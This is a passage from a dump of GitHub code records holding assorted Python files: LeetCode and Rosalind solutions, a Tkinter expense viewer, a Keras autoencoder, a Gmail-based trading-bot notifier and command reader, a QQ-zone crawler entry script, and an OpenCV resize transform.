main()\n","repo_name":"AlexanderTyutin/play-python","sub_path":"duolingo-progress-checker/check_hsk_vocab.py","file_name":"check_hsk_vocab.py","file_ext":"py","file_size_in_byte":6785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17740486206","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\"\"\"\n@author:lei\n@utils:func_proc.py.py\n@time:2023/04/29\n@email:leigang431@163.com\n\"\"\"\nimport os\nimport time\nfrom loguru import logger\nimport argparse\n\ntrace = logger.add('runtime.log', level=\"DEBUG\")\n\n\n# parse input arguments\ndef parse_args(args):\n logger.debug(\"parse_args start\")\n if args.src_path is None:\n logger.debug(\"src_path args is None\")\n exit()\n if args.dest_path is None:\n logger.debug(\"dest_path args is None\")\n exit()\n if args.keyword is None:\n logger.debug(\"keyword args is None\")\n exit()\n src_path = args.src_path\n dest_path = args.dest_path\n keyword =args.keyword\n return src_path, dest_path,keyword\n\ndef parse_json(json_file):\n logger.debug(\"parse_json:{}\".format(json_file))\n\n\ndef func_proc_run(src_path, dest_path,keyword):\n logger.debug(\"run start\")\n logger.debug(\"src_path:{},dest_path:{},keyword:{}\".format(src_path, dest_path,keyword))\n\n\ndef main(args):\n logger.debug(\"main start\")\n src_path, dest_path,keyword = parse_args(args)\n func_proc_run(src_path, dest_path, keyword)\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"[demo-20230430]Demo of argparse\")\n parser.add_argument('-s','--src_path', default=\"log\",type=str, help='path of file of src log')\n parser.add_argument('-d','--dest_path',default=\"decode_log\",type=str, help='path of dest log')\n parser.add_argument('-k', '--keyword', default=\"keyword.json\", type=str, help='path of keyword.json')\n args = parser.parse_args()\n main(args)\n","repo_name":"leigangblog/gui_test","sub_path":"demo1/src/func_proc.py","file_name":"func_proc.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38425364981","text":"'''\nhttps://leetcode-cn.com/problems/missing-number/\n\nGiven an array nums containing n numbers from the range [0, n], find the one number in that range that does not appear in the array.\n\nExample 1:\n Input: nums = [3,0,1]\n Output: 2\n Explanation: n = 3, so since there are 3 numbers, every number lies in the range [0,3]. 2 is the missing number because it does not appear in nums.\n\nExample 2:\n Input: nums = [0,1]\n Output: 2\n Explanation: n = 2, so since there are 2 numbers, every number lies in the range [0,2]. 2 is the missing number because it does not appear in nums.\n\nExample 3:\n Input: nums = [9,6,4,2,3,5,7,0,1]\n Output: 8\n Explanation: n = 9, so since there are 9 numbers, every number lies in the range [0,9]. 8 is the missing number because it does not appear in nums.\n\nExample 4:\n Input: nums = [0]\n Output: 1\n Explanation: n 
= 1, so since there is 1 number, every number lies in the range [0,1]. 1 is the missing number because it does not appear in nums.\n\nConstraints:\n n == nums.length\n 1 <= n <= 10^4\n 0 <= nums[i] <= n\n All the numbers in nums are unique\n\n'''\nfrom typing import List\n\nclass Solution:\n \"\"\" Approach: sorting \"\"\"\n def missingNumber(self, nums: List[int]) -> int:\n nums.sort() # sort the array\n for i, num in enumerate(nums): # enumerate() combines an iterable (list, tuple, string, ...) into an indexed sequence that yields both the index and the value; it is typically used in for loops.\n if num != i: # the missing number is found by checking whether the element at each index equals that index.\n return i\n return num\n\n \"\"\" Approach: hash set \"\"\"\n def missingNumber(self, nums: List[int]) -> int:\n s = set(nums) # traverse nums and add every element to a hash set\n for i in range(len(nums) + 1): # check each integer from 0 to n for membership in the hash set\n if i not in s: # the number absent from the hash set is the missing number\n return i\n\n \"\"\" Approach: math \"\"\"\n def missingNumber(self, nums: List[int]) -> int:\n n = len(nums)\n total = n * (n + 1) // 2 # let total be the sum of all integers from 0 to n; by Gauss's formula, total = n*(n+1)/2\n arrSum = sum(nums) # let arrSum be the sum of the elements of nums; arrSum falls short of total by exactly the missing number\n return total - arrSum # so the missing number is the difference between total and arrSum\n\n \"\"\" Approach: bit manipulation (XOR)\n x ^ x = 0 and x ^ 0 = x \"\"\"\n def missingNumber(self, nums: List[int]) -> int:\n xor = 0\n print (list(enumerate(nums)))\n for i, num in enumerate(nums): # (0, 3), (1, 0), (2, 1)\n xor = xor ^ i ^ num # uses a ^ b ^ b = a\n return xor ^ len(nums)\n\n\nif __name__ == \"__main__\":\n nums = [3,0,1]\n sol = Solution()\n result = sol.missingNumber(nums)\n print (result)","repo_name":"jasonmayday/LeetCode","sub_path":"leetcode_algorithm/1_easy/0268_丢失的数字.py","file_name":"0268_丢失的数字.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"27376633831","text":"# Author: Anthony Corton\n# Date: 12/20/2021\n# Description: Practicing leetcode problem #11, from\n# algorithm topic/Medium List, given an integer array\n# find the container with the most water (biggest possible area)\n\n\nclass Solution:\n def maxArea(self, height: List[int]) -> int:\n left_bound = 0\n right_bound = len(height) - 1\n max_area = 0\n\n while left_bound != right_bound:\n current_area = self.calculateArea(left_bound, right_bound, height)\n\n if current_area > max_area:\n max_area = current_area\n\n if height[left_bound] < height[right_bound]:\n left_bound += 1\n else:\n right_bound -= 1\n\n return max_area\n\n def calculateArea(self, left, right, height):\n # calculate area between pillars\n # first find shortest length\n\n if height[left] > height[right]:\n length = height[right]\n else:\n length = height[left]\n\n # calculate width\n\n width = right - left\n\n # print(\"the left side is\", left)\n # print(\"the right side is\", right)\n\n return length * width","repo_name":"Cortona1/LeetCode-Solutions","sub_path":"Medium Level Problems/ContainerWithMostWater.py","file_name":"ContainerWithMostWater.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34534218078","text":"import sys\nsys.setrecursionlimit(10**7)\nw = -1\nh = -1\n\ndef dfs(y,x):\n if((y,x) not in arrived):\n arrived.append((y,x))\n for i in range(-1,2):\n for j in range(-1, 2):\n if(c[y+i][x+j] == 1):dfs(y+i,x+j)\n\n # recursion\n # if any of the 8 neighbors contains an unvisited 1\n # dfs(n)\n # else\n # return (may not even be needed).\n # once every 1 is in [arrived], the answer is the number of times dfs(n) was called other than recursively\n\n\n # return True\nans = []\nwhile w != 0 and h != 0:\n w,h = map(int,sys.stdin.readline().split())\n\n cnt = 0\n arrived = []\n # print(w)\n # exit()\n if w == 0 and h == 0:\n for i in ans:\n print(i)\n exit()\n else:\n # 
pad the grid with a border of zeros on the top, bottom, left and right\n c = [[0] + list(map(int,input().split())) +[0] if (i > 0 and i < h+1) else [0 for j in range(w+2)] for i in range(0,h+2)]\n for i in range(1,h+1):\n for j in range(1,w+1):\n if(c[i][j] == 1 and (i,j) not in arrived):\n dfs(i,j)\n cnt += 1\n # print(\"cnt\",cnt)\n ans.append(cnt)\n","repo_name":"kibutan/AizuOnlineJudge","sub_path":"AOJ 1160 - 島はいくつある?.py","file_name":"AOJ 1160 - 島はいくつある?.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73708541541","text":"import logging\nimport os\nimport json\nfrom nltk.tokenize.toktok import ToktokTokenizer\nfrom pair import *\n\nclass Corpus(object):\n\n def __init__(self):\n self._toktok = ToktokTokenizer()\n\n def _get_tokenized_sentence(self, sentence):\n return self._toktok.tokenize(sentence) \n\n '''\n Returns a dictionary with word, sentences\n '''\n def _select_sentences_with_diacritics(self, filename, diacritics):\n logging.debug(\"_select_sentences_with_diacritics\")\n\n diacritics_sentences = {}\n SHORT_SENTENCE = 10\n with open(filename, \"r\") as source:\n while True:\n src = source.readline().lower()\n\n if not src:\n break\n \n words = self._get_tokenized_sentence(src)\n for word in words:\n if word not in diacritics:\n continue\n\n if len(words) < SHORT_SENTENCE:\n continue\n\n if word in diacritics_sentences:\n sentences = diacritics_sentences[word]\n else:\n sentences = []\n\n if len(sentences) < 10 and src not in sentences:\n sentences.append(src)\n diacritics_sentences[word] = sentences\n\n for diacritic in diacritics_sentences.keys():\n sentences = diacritics_sentences[diacritic]\n logging.debug(f\"{diacritic}\")\n #for sentence in sentences:\n # logging.debug(f\" {sentence}\")\n \n\n return diacritics_sentences\n\n\n def get_dictionaries_frequencies_and_sentences(self, corpus, pairs):\n logging.debug(\"set_dictionaries_frequencies_and_sentences\")\n\n diacritics, no_diacritics = get_words_dictionaries(pairs)\n\n lines = 0\n words_in_corpus = 0\n with open(corpus, \"r\") as source:\n while True:\n\n src = source.readline().lower()\n\n if not src:\n break\n\n lines = lines + 1\n words = self._get_tokenized_sentence(src)\n words_in_corpus += len(words)\n\n for word in words:\n if word in diacritics:\n frequency = diacritics[word]\n diacritics[word] = frequency + 1\n\n pair = pairs[word]\n if len(pair.diacritic.sentences) < 10 and src not in pair.diacritic.sentences:\n pair.diacritic.sentences.append(src)\n\n if word in no_diacritics:\n frequency = no_diacritics[word]\n no_diacritics[word] = frequency + 1\n\n logging.info(f\"Read corpus {corpus}, lines {lines}, words {words_in_corpus}\")\n return diacritics, no_diacritics\n\n","repo_name":"jordimas/lt-diacritics","sub_path":"corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31992133021","text":"from tkinter import *\nfrom tkinter import ttk\nimport Homepage\nimport database3\nimport PIL\nfrom PIL import Image, ImageTk\n\ndef expenseRecordTable():\n \"\"\"\n Allows user to view the expense record.\n \"\"\"\n\n \"\"\"Database Initialization\"\"\"\n database3.dropTableExpenseRecord()\n database3.createTableExpenseRecord()\n database3.readExpenseRecordFile()\n\n \"\"\"Window Initialization\"\"\"\n # Create the main window\n erTableWindow = Tk()\n erTableWindow.geometry('640x360')\n erTableWindow.title('Expense Record Table')\n 
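# window chrome: white background and the fonts used throughout the page\n 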
erTableWindow['bg'] = 'white'\n erTableWindow.config(bg='white')\n font = (\"Arial\", 8)\n title_font = (\"Arial bold\", 18)\n\n \"\"\"Window Commands\"\"\"\n def homePage():\n #Return user to the login page.\n erTableWindow.destroy()\n Homepage.homepage()\n\n def orgByDate():\n #Organizes Expense Record by Date, ASC\n database3.recordPerformQuery(\"\"\"SELECT expense_record.date, expense_record.payee, \n expense_record.amount_paid, expense_record.budget_cat FROM expense_record \n ORDER BY expense_record.date\"\"\", \"tempQuery.txt\")\n updateDisplay()\n\n def orgByPayee():\n #Organizes Expense Record by Payee, ASC\n database3.recordPerformQuery(\"\"\"SELECT expense_record.date, expense_record.payee, \n expense_record.amount_paid, expense_record.budget_cat FROM expense_record \n ORDER BY expense_record.payee\"\"\", \"tempQuery.txt\")\n updateDisplay()\n\n def orgByAmount():\n #Organizes Expense Record by Amount Paid, ASC\n database3.recordPerformQuery(\"\"\"SELECT expense_record.date, expense_record.payee, \n expense_record.amount_paid, expense_record.budget_cat FROM expense_record \n ORDER BY expense_record.amount_paid\"\"\", \"tempQuery.txt\")\n updateDisplay()\n\n def orgByCategory():\n #Organizes Expense Record by Budget Category, ASC\n database3.recordPerformQuery(\"\"\"SELECT expense_record.date, expense_record.payee, \n expense_record.amount_paid, expense_record.budget_cat FROM expense_record \n ORDER BY expense_record.budget_cat\"\"\", \"tempQuery.txt\")\n updateDisplay()\n\n def updateDisplay():\n #Uses the tempquery from one of the org functions and updates the tree to display the new order.\n with open('tempQuery.txt', 'r') as tempFile:\n newExpenses = [line.strip().split(',') for line in tempFile]\n tempFile.close()\n for val in tree.get_children():\n tree.delete(val)\n for newExpense in newExpenses:\n date = newExpense[0]\n payee = newExpense[1]\n amount = \"-$\" + newExpense[2] #Add a negative sign to indicate outgoing payment\n category = newExpense[3]\n tree.insert('', 'end', values=(date, payee, amount, category))\n\n \"\"\"Window Contents\"\"\"\n #Read expense information from the expense_record.txt file\n with open('expense_record.txt', 'r') as file:\n expenses = [line.strip().split(',') for line in file]\n file.close()\n\n #Create a Frame widget to display the expense list\n frame = Frame(erTableWindow, bd=2, relief=SOLID, bg='white')\n frame.pack(expand=True, fill=BOTH, padx=20, pady=20)\n\n #Add a label to display the page title\n Label(frame,\n text=\"Expense Record\",\n font=title_font,\n padx=20,\n pady=20,\n bg='white').pack(expand=True, fill=BOTH)\n\n #Create a Treeview widget to display the expense information as a table\n tree = ttk.Treeview(frame,\n columns=('date', 'payee', 'amount', 'category'),\n show='headings')\n\n #Add column headers\n tree.heading('date', text='Date', command=orgByDate)\n tree.heading('payee', text='Payee',command=orgByPayee)\n tree.heading('amount', text='Amount', command=orgByAmount)\n tree.heading('category', text='Category', command=orgByCategory)\n\n #Add each expense to the list\n for expense in expenses:\n date = expense[1]\n payee = expense[2]\n amount = \"-\" + expense[\n 3] # Add a negative sign to indicate outgoing payment\n category = expense[4]\n tree.insert('', 'end', values=(date, payee, amount, category))\n\n #Display the expense list in the window with a scrollbar\n scrollbar = ttk.Scrollbar(frame, orient='vertical', command=tree.yview)\n tree.configure(yscroll=scrollbar.set)\n tree.pack(side=LEFT, fill=BOTH, padx=20, 
pady=20, expand=True)\n scrollbar.pack(side=RIGHT, fill=Y)\n\n #Add a button to return to the homepage\n Button(erTableWindow, text=\"Homepage\", font=font,\n command=homePage).pack(fill=X,\n expand=True,\n side=BOTTOM,\n padx=20,\n pady=20)\n\n # Display the best part of the program\n bestFriend = ImageTk.PhotoImage(PIL.Image.open(\"profile3.jpg\").resize((80, 80)))\n profile_label = Label(erTableWindow, image=bestFriend, bg='white')\n profile_label.image = bestFriend\n profile_label.pack(padx=20, pady=20)\n\n # Launch the main loop\n erTableWindow.mainloop()\n","repo_name":"DIceEvYo/g7_cs343_sp23","sub_path":"expenseRecordTable.py","file_name":"expenseRecordTable.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16564264873","text":"from coldtype import *\nfrom coldtype.axidraw import *\n\nco = Font.ColdtypeObviously()\nmis = Font.Find(\"Mistral\")\n\n@axidrawing()\ndef test_draw(r):\n border = P(r.inset(50)).tag(\"border\")\n \n letters = (StSt(\"COLD\", co, 900, wdth=0.15, ro=1)\n .pen()\n .align(r)\n .tag(\"letters\"))\n\n hatch_rs = r.inset(20).subdivide(250, \"N\")\n hatches = (PS.Enumerate(hatch_rs, lambda x:\n P(x.el) if x.i%2==0 else None)\n .pen()\n .intersection(letters.copy())\n .explode()\n .map(lambda _,p: P().line(p.ambit().ecy))\n .tag(\"hatches\"))\n\n typ = (StSt(\"type\", mis, 650)\n .pen()\n .align(r, tv=1)\n .translate(0, -50)\n .removeOverlap()\n .tag(\"type\"))\n \n return PS([\n border,\n hatches,\n typ\n ])\n\nnumpad = {\n 1: test_draw.draw(\"border\"),\n 2: test_draw.draw(\"hatches\"),\n 3: test_draw.draw(\"type\")\n}","repo_name":"econchick/coldtype","sub_path":"test/visuals/test_axidraw.py","file_name":"test_axidraw.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"39575275416","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\nimport easygui\n\nfavor = easygui.choicebox(\"What do you like?\", choices=['apple', 'banana', 'milk'])\neasygui.msgbox(\"Your choice is \" + favor)\nfavor = easygui.buttonbox(\"What do you like?\", choices=['apple', 'banana', 'milk'])\neasygui.msgbox(\"Your choice is \" + favor)\nfavor = easygui.enterbox(\"What do you like?\")\neasygui.msgbox(\"Your enter \" + favor)\n","repo_name":"wula50/tryForGit","sub_path":"venv/icecream.py","file_name":"icecream.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16215495299","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom tensorflow import keras\nfrom tensorflow.python.keras import Input, Model\nfrom tensorflow.python.keras.engine.saving import load_model\nfrom tensorflow.python.keras.layers import Dense\n\n\nclass LossHistory(keras.callbacks.Callback):\n def __init__(self):\n super().__init__()\n self.losses = []\n\n def on_batch_end(self, batch, logs={}):\n self.losses.append(logs.get('loss'))\n\n\ndef autoencoder():\n input_image = Input(shape=(784,))\n # Encoder\n encoder = Dense(units=784, activation='relu')(input_image)\n encoder = Dense(units=512, activation='relu')(encoder)\n encoder = Dense(units=256, activation='relu')(encoder)\n encoder = Dense(units=128, activation='relu')(encoder)\n encoder = Dense(units=64, activation='relu')(encoder)\n encoder = Dense(units=32, activation='relu')(encoder)\n\n # Decoder\n decoder = Dense(units=64, activation='relu')(encoder)\n 
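# widen back out through the decoder, mirroring the encoder, to reconstruct the 784-pixel image\n 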
decoder = Dense(units=128, activation='relu')(decoder)\n decoder = Dense(units=256, activation='relu')(decoder)\n decoder = Dense(units=512, activation='relu')(decoder)\n decoder = Dense(units=784, activation='sigmoid')(decoder)\n\n enc = Model(\n input_image, encoder\n )\n\n autoenc = Model(\n input_image, decoder\n )\n\n autoenc.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])\n\n return enc, autoenc\n\n\ndef trained_encoder():\n \"\"\"Return a keras model\"\"\"\n return load_model(\"encoder_model\", compile=True)\n\n\ndef trained_autoencoder():\n return load_model(\"autoencoder_model\")\n\n\ndef generate_trained_models():\n (x_train, y_train), (x_test, y_test) = keras.datasets.fashion_mnist.load_data()\n x_train = np.reshape(x_train, (60000, 784))\n x_test = np.reshape(x_test, (10000, 784))\n x_train = x_train.astype('float32') / 255\n x_test = x_test.astype('float32') / 255\n encoder, autoenc = autoencoder()\n lossHistory = LossHistory()\n autoenc.summary()\n epochs = 100\n autoenc.fit(x_train, x_train, epochs=epochs, batch_size=128, shuffle=True, validation_data=(x_test, x_test),\n callbacks=[lossHistory])\n\n plt.plot(lossHistory.losses)\n plt.xlabel(\"number of batches\")\n for i in range(int(epochs / 10)):\n plt.axvline(int(60000 / 128) * i * 10)\n plt.ylabel(\"loss value\")\n plt.savefig(\"loss\")\n encoder.save(\"encoder_model\")\n autoenc.save(\"autoencoder_model\")\n\n\ndef generate_graphs():\n _, (x_test, _) = keras.datasets.fashion_mnist.load_data()\n x_test = np.reshape(x_test, (10000, 784))\n x_test = x_test.astype('float32') / 255\n autoencoded_images = trained_autoencoder().predict(x_test[0:10]).reshape((10, 28, 28))\n for i in range(0, 10):\n figure = plt.figure()\n im1 = figure.add_subplot(2, 1, 1)\n im1.imshow(x_test[i].reshape((28, 28)) * 255)\n im2 = figure.add_subplot(2, 1, 2)\n im2.imshow(autoencoded_images[i].reshape((28, 28)) * 255)\n plt.savefig(\"images/img\" + str(i))\n plt.clf()\n","repo_name":"Sagebati/datascience","sub_path":"auto_encoder.py","file_name":"auto_encoder.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37714319449","text":"n = 82\nk=10\nnfac = 1\nnkfac = 1\nfor i in range(1,n+1):\n\tnfac = nfac * i\n\tif i == (n-k):\n\t\tnkfac = nfac\ntop = nfac\nbottom = nkfac\nsolution = top // bottom % 1000000\nprint(solution)","repo_name":"NathanielLovin/Rosalind","sub_path":"pper.py","file_name":"pper.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"24985546191","text":"# -*- coding: utf-8 -*-\n# ----------------------------\n# @Time : 2021/5/15 4:36 PM\n# @Author : changqingai\n# @FileName: 47_max_value.py\n# ----------------------------\n\n\nclass Solution:\n def maxValue(self, grid):\n # \t88 ms\t16.3 MB\n matrix_value = [[0 for j in range(0, len(grid[i]))] for i in range(0, len(grid))]\n\n for i in range(0, len(grid)):\n for j in range(0, len(grid[i])):\n left = matrix_value[i][j-1] if j - 1 >= 0 else 0\n up = matrix_value[i-1][j] if i - 1 >= 0 else 0\n matrix_value[i][j] = max(left, up) + grid[i][j]\n return matrix_value[len(grid) - 1][len(grid[0]) - 1]\n\n\nif __name__ == \"__main__\":\n # nums = [\n # [1, 3, 1],\n # [1, 5, 1],\n # [4, 2, 1]\n # ]\n nums = [\n [1, 10, 3, 8],\n [12, 2, 9, 6],\n [5, 7, 4, 11],\n [3, 7, 16, 5]\n ]\n ans = Solution().maxValue(nums)\n print(\"ans: \", 
ans)\n","repo_name":"836304831/leetcode","sub_path":"jianzhi_offer/47_max_value.py","file_name":"47_max_value.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"21234752849","text":"import unittest\n\nfrom celly.cog import Cog\n\n\nclass TestCog(unittest.TestCase):\n def test_cog(self):\n cog = Cog(\n name=\"test\",\n inputs=dict(\n arg1=\"1\",\n arg2=\"2\",\n arg3=\"3\",\n ),\n )\n\n def test_lambda_cog(self):\n cog = Cog(\n \"test\",\n output=lambda: \"test_data\"\n )\n assert cog() == \"test_data\"\n","repo_name":"TheOrangeOne/celly","sub_path":"test/test_cog.py","file_name":"test_cog.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2934577851","text":"\n#Email libs\nimport smtplib, ssl,random\nimport imaplib, email\nfrom email.header import decode_header\nimport time\n\nport = 465\npassword = \"\"\ncont = ssl.create_default_context()\n\ndef checkin(profit:float, t:float, buys, sells,account_value):\n print(\"checking\")\n \n j = round((time.time() - t)/60,2)\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", port, context=cont) as server:\n server.login(\"botmanupdate@gmail.com\", password)\n sender_email = \"botmanupdate@gmail.com\"\n receiver_email = \"\"\n message = \"\"\"\\\n Subject: Bot Update\n\n \"\"\"\n line = randomsaying()\n message += line\n message += (\"Profit: \" + str(profit)+\"\\n\")\n message += (\"Time since start(min):\" + str(j)+\"\\n\")\n message += (\"Value of account in btc: \"+ str(account_value.value) +\"\\n\")\n message += (\"Number of Trades: \" + str(buys+sells))\n \n server.sendmail(sender_email,receiver_email,message)\n server.quit\ndef error_report(line,line2=\"\"):\n try:\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", port, context=cont) as server:\n server.login(\"botmanupdate@gmail.com\", password)\n sender_email = \"botmanupdate@gmail.com\"\n receiver_email = \"\"\n message = \"\"\"\\\n Subject: Bot Error\n\n \"\"\"\n message += line\n if len(line2) > 0: \n message += line2\n\n server.sendmail(sender_email,receiver_email,message)\n server.quit\n except Exception as e:\n print(e)\ndef custom_message(line):\n try:\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", port, context=cont) as server:\n server.login(\"botmanupdate@gmail.com\", password)\n sender_email = \"botmanupdate@gmail.com\"\n receiver_email = \"\"\n message = \"\"\"\\\n Subject: Message\n\n \"\"\"\n message += line\n \n\n server.sendmail(sender_email,receiver_email,message)\n server.quit\n except Exception as e:\n print(e)\ndef randomsaying():\n random.seed(a=None,version=2)\n random_number = random.randint(1,5)\n if random_number == 1:\n return \"The Oracles have breached the aether!\\n Heed their message\\n\"\n if random_number == 2:\n return \"Ah yes here are your stats\\n\"\n if random_number == 3:\n return \"I AM STILL ALIVE\\n\"\n if random_number == 4:\n return \"We have breached the great shroud!\\n\"\n if random_number == 5:\n return \"Here is your arcane wisdom\\n\"\ndef emailcontroller(checkin,shutdown,restart, buy_sell_arr,print_items):\n \n \n while True:\n with imaplib.IMAP4_SSL(\"imap.gmail.com\",993) as imap:\n imap.login(\"botmanupdate@gmail.com\", password)\n status, messages = imap.select(\"Commands\")\n\n N = 2\n\n messages = int(messages[0])\n for i in range(messages, messages-N, -1):\n try:\n res, msg = imap.fetch(str(i), \"(RFC822)\")\n except Exception as e:\n print(e)\n 
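# this message could not be fetched; skip it and move on to the next one\n 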
continue\n for response in msg:\n if isinstance(response, tuple):\n # parse a bytes email into a message object\n msg = email.message_from_bytes(response[1])\n\n From, encoding = decode_header(msg.get(\"From\"))[0]\n if isinstance(From, bytes):\n From = From.decode(encoding)\n # if the email message is multipart\n if From == \"\":\n \n if msg.is_multipart():\n # iterate over email parts\n for part in msg.walk():\n # extract content type of email\n content_type = part.get_content_type()\n content_disposition = str(part.get(\"Content-Disposition\"))\n \n try:\n # get the email body\n body = part.get_payload(decode=True).decode()\n except:\n pass\n if content_type == \"text/plain\" and \"attachment\" not in content_disposition:\n if body == \"Hello\":\n print(\"Hello\")\n custom_message(\"Greetings\")\n if body == \"Update\":\n checkin.value = 1\n custom_message(\"Update will be summoned...\\nPlease Wait\")\n if body == \"Shutdown\":\n custom_message(\"If you wish...\")\n shutdown.value = 1\n if body == \"Restart\":\n custom_message(\"What have I done, to deserve a reboot?\")\n restart.value = 1\n if body == \"Help\":\n custom_message(\"And Help you shall recieve!\\n Possible commands:\\n Hello, sends greetings \\n Update, pushes checkin message \\n Shutdown, shuts down program \\n Restart, kills then restarts processes \\n Buy, will set a buy per for item \\n Sell, will sell item \\n Pairs, will send list of pairs active\")\n if \"Buy\" in body:\n if len(body) < 10:\n for j,i in enumerate(body):\n buy_sell_arr[j] = i.encode()\n \n print(buy_sell_arr)\n print(buy_sell_arr.value)\n custom_message(\"Will Attempt Buy\")\n if \"Sell\" in body:\n if len(body) < 10:\n for j,i in enumerate(body):\n buy_sell_arr[j] = i.encode()\n \n custom_message(\"Will Attempt Sell\")\n if \"Pairs\" in body:\n print_items.value = 1\n custom_message(\"Pairs incoming: \")\n\n\n \n clean(imap) \n imap.expunge()\n imap.close()\n imap.logout()\n time.sleep(360)\ndef clean(imap):\n typ, data = imap.search(None, 'ALL')\n for num in data[0].split():\n imap.store(num, '+FLAGS', '\\\\Deleted')\n","repo_name":"Imperial-fool/botWorkspace","sub_path":"EmailModule.py","file_name":"EmailModule.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38728715764","text":"#!/usr/bin/env python3\n\nimport get_my_friends\nimport get_moods\nimport get_qq_number\n\nif __name__ == '__main__':\n\n # First, we need to get all our qq friends data\n get_friends_obj = get_my_friends.Get_friends_number()\n get_friends_obj.get_friends()\n\n # Second, deal with this data, clean it\n # From the get_friends result get the useful data\n # And save it to file qqnumber.inc\n # The format of this file just a list\n get_qq_item_obj = get_qq_number.exact_data_from_result()\n get_qq_item_obj.exact_qq_number()\n\n # Finally, use the cleaned data to get mood\n # Base on last step's qqnumber.inc file\n # exact the qq number and start to get their moods\n get_moods_obj = get_moods.Get_moods_start()\n get_moods_obj.get_moods_start()\n","repo_name":"zhuliquan/crawler_learning","sub_path":"QQzone_crawler/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9349488093","text":"import sys\nimport collections\nimport heapq\n\nV, E = map(int,sys.stdin.readline().split())\nK = int(sys.stdin.readline())\ngraph = 
collections.defaultdict(list)\nfor i in range(E):\n u,v,w = map(int,sys.stdin.readline().split())\n graph[u].append((v,w))\nQ = [(0,K)]\ndist = collections.defaultdict(int)\nwhile Q:\n print(Q)\n time, node = heapq.heappop(Q)\n if node not in dist:\n dist[node] = time\n for v,w in graph[node]:\n # alt 는 총 가중치, time 현재 가중치, w는 v까지 이동했을 때 필요한 가중치\n alt = time + w \n heapq.heappush(Q,(alt,v))\nfor i in range(1,V+1):\n if dist[i] == 0 and i != K:\n print(\"INF\")\n else:\n print(dist[i])","repo_name":"hiwhwnsgh/Study","sub_path":"Algorithm/BaekJoon/1753 - 최단경로(완).py","file_name":"1753 - 최단경로(완).py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24435478771","text":"from typing import Union\n\nimport cv2\nimport numpy as np\nimport torch\nfrom PIL import Image\n\n\nclass ResizeOCV:\n def __init__(self, size):\n self.size = self._to_tuple(size)\n\n def _to_tuple(self, size):\n if isinstance(size, (int, float)):\n return (size, size)\n elif isinstance(size, (tuple, list)):\n return size\n else:\n raise ValueError(\"Invalid type\", type(size))\n\n def __call__(self, x: Union[torch.Tensor, np.ndarray, Image.Image]):\n return_type = \"numpy\"\n\n if isinstance(x, Image.Image):\n x = np.asarray(x)\n return_type = \"pil\"\n elif isinstance(x, torch.Tensor):\n x = x.cpu().numpy()\n return_type = \"tensor\"\n elif not isinstance(x, np.ndarray):\n raise RuntimeError(f\"Cannot handle {type(x)}.\")\n\n if len(x.shape) != 3:\n raise RuntimeError(f\"Cannot handle data in shape {x.shape}\")\n\n try:\n index_dim = list(x.shape).index(3)\n except ValueError as e:\n raise RuntimeError(\n \"Channel dim not found, make sure there is color dim with shape 3.\"\n ) from e\n\n if index_dim == 0:\n x = np.transpose(x, (1, 2, 0))\n elif index_dim != 2:\n raise RuntimeError(\"Invalid dim order, channel dim is in middle.\")\n\n return_float = False\n if x.dtype == \"float32\":\n x = np.clip(x, 0, 1)\n x *= 255.0\n x = x.astype(np.uint8)\n return_float = True\n elif x.dtype != \"uint8\":\n raise RuntimeError(f\"Cannot handle {x.dtype} arrays.\")\n\n x = cv2.cvtColor(x, cv2.COLOR_RGB2BGR)\n x = cv2.resize(x, self.size, interpolation=cv2.INTER_CUBIC)\n x = cv2.cvtColor(x, cv2.COLOR_BGR2RGB)\n x = np.ascontiguousarray(x)\n\n if return_float:\n x = x.astype(np.float32)\n x /= 255.0\n\n if index_dim == 0:\n x = np.transpose(x, (2, 0, 1))\n x = np.ascontiguousarray(x)\n\n if return_type == \"pil\":\n return Image.fromarray(x)\n elif return_type == \"tensor\":\n return torch.from_numpy(x)\n\n return 